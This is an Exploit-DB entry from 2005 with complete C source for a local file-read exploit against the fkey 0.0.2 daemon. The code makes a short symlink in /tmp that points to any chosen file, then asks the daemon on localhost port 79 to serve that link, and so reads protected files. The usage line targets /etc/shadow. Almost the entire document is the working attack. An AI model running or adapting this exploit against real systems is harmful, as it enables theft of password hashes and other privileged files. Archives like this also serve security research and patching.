fkey <= 0.0.2 - Local File Accessibility Exploit

2005-01-20T00:00:00
ID EDB-ID:763
Type exploitdb
Reporter vade79
Modified 2005-01-20T00:00:00

Description

fkey <= 0.0.2 Local File Accessibility Exploit. Local exploit for linux platform

                                        
                                            /*[ fkey[v0.0.2]: local/remote file accessibility exploit. ]*
*                                                          *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)         *
*                                                          *
* netris homepage/URL:                                     *
*  http://www.freshmeat.net/projects/fkey                  *
*                                                          *
* compile:                                                 *
*  gcc xfkey.c -o xfkey                                    *
*                                                          *
* syntax:                                                  *
*  # ./xfkey /etc/shadow 2&gt;~/save_filename                 *
*                                                          *
* bug:                                                     *
*  fkey is a finger-like daemon for accessing remote files *
*  in a specified directory.  there is no limitations      *
*  placed on the file acessing other than it must be a     *
*  filename/path equal to 10 or less bytes.  this limits   *
*  the remote possibilities somewhat, but symlinking to a  *
*  short path(ie. /tmp/file) locally can access anything.  *
*  (this exploits locally)                                 *
*                                                          *
* note:                                                    *
*  this is pretty low-risk due to the fact that the        *
*  program isn't very common, just browsing freshmeat.net  *
*  and killing some time.                                  *
************************************************************/
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;string.h&gt;
#include &lt;strings.h&gt;
#include &lt;signal.h&gt;
#include &lt;netdb.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/time.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;arpa/inet.h&gt;

#define TMPFILE "/tmp/xfkey" /* must be 10 characters or less. */

void fkey_connect(unsigned short);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}

int main(int argc,char **argv){
unsigned short port=79;
if(argc&lt;2){
 printf("[!] syntax: %s &lt;file&gt; [port]\n",argv[0]);
 exit(1);
}
if(argc&gt;2)port=atoi(argv[2]);
unlink(TMPFILE);
if(symlink(argv[1],TMPFILE))
 printe("symlink() failed.",1);
fkey_connect(port);
unlink(TMPFILE);
exit(0);
}
void fkey_connect(unsigned short port){
int sock=0,l=0,m=0;
char buf[1024+1];
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: localhost:%u.\n",port);
if((s.sin_addr.s_addr=inet_addr("127.0.0.1"))){
 if(!(t=gethostbyname("localhost")))
  printe("couldn't resolve hostname.",1);
 memcpy((char*)&s.sin_addr,(char*)t-&gt;h_addr,
 sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(3);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
 printe("connection failed.",1);
alarm(0);
printf("[*] successfully connected: localhost:%u.\n",port);
write(sock,TMPFILE,strlen(TMPFILE));
alarm(5);
for(memset(buf,0,1025);(l=read(sock,buf,1024));memset(buf,0,1025)){
 fputs(buf,stderr);
 m+=l;
}
alarm(0);
if(m&lt;=0)
 printe("exploit failed, file doesn't exist or zero-length file.",0);
close(sock);
return;
}
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}

// milw0rm.com [2005-01-20]